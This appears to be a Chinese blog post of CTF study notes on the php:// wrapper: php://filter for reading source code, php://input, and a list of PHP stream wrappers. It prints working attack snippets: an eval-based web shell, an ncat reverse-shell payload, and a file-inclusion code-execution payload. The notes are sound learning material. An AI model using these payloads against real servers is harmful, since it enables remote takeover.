php://协议

做文件包含题的时候多次用到了php://filter/convert.base64-encode/resource，稍微深入的去了解一下

php://的作用是访问各个输入/输出流，他可以支持几种不同的协议

https://www.php.net/manual/zh/wrappers.php.php

php://filter 是一种元封装器，设计用于数据流打开时的筛选过滤应用

参数如下
avatar

这玩意一般会给（坏蛋）拿来读取文件的源代码，上面提到的php://filter/convert.base64-encode/resource，和php://filter/read=convert.base64-encode/recource相同，意思是用base64编码的方式来读取文

https://blog.csdn.net/destiny1507/article/details/82347371

这篇博客讲到了另外几种利用方式，一种是利用上面编码解码，将马用base64加密，然后用这玩意解码出来，我们的可以被解析，而安全机制另外添加在上面的数据被解码后也就会失效

将都讲了顺带讲点别的

php://input可以访问请求原始数据的只读流，也就是说，这玩意可以读取没有处理过的post数据，https://blog.csdn.net/weixin_30326515/article/details/96024055，这篇文章讲了如何利用这玩意来getshell

<?php @eval(file_get_contents('php://input'))?>

然后提交post：system('ncat -e /bin/bash localhost 1234');

之后再用nc反弹shell


第二种
<?php @include($_GET["file"])?>

提交post:<?php system('ifconfig');?>，这样就变成代码执行漏洞

但是我估计这篇文章是复制粘贴来的，图片都挂了.....

另外其他几种PHP支持的协议和封装协议

file:// — 访问本地文件系统
http:// — 访问 HTTP(s) 网址
ftp:// — 访问 FTP(s) URLs
php:// — 访问各个输入/输出流（I/O streams）
zlib:// — 压缩流
data:// — 数据（RFC 2397）
glob:// — 查找匹配的文件路径模式
phar:// — PHP 归档
ssh2:// — Secure Shell 2
rar:// — RAR
ogg:// — 音频流
expect:// — 处理交互式的流

将都讲了顺带讲点别的

评论已关闭

最新文章

最近回复

分类

归档

其它